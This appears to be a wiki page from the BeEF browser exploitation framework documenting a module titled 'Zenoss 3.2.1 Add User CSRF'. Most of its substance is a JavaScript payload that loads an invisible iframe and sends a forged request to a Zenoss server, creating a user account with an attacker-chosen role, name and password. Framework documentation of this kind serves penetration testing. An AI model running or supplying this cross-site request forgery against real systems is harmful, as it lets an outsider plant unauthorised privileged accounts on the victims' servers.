Module: Zenoss 3.2.1 Add User CSRF

Summary

Objective: add a user to a Zenoss Core 3.x server
Authors: bcoles
Browsers: All
Code

Internal Working

Uses an invisible iframe with a GET request to add an user account

  var base = '<%= @base %>';
  var user_level = '<%= @user_level %>';
  var username = '<%= @username %>';
  var password = '<%= @password %>';

  var zenoss_add_user_iframe = beef.dom.createInvisibleIframe();
  zenoss_add_user_iframe.setAttribute('src', base+'/zport/dmd/ZenUsers?tableName=userlist&zenScreenName=manageUserFolder.pt&manage_addUser%3Amethod=OK&defaultAdminRole='+user_level+'&roles%3Alist='+user_level+'&userid='+username+'&password='+password);

Feedback

User Guide

I. Introduction | II. Basic Utilization | III. Advanced Utilization | IV. Development | V. References

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Module: Zenoss 3.2.1 Add User CSRF

Summary

Internal Working

Feedback

User Guide

Community

I - Starting BeEF

II - Basic Utilization

III - Advanced Utilization

IV - Development

V - References

Clone this wiki locally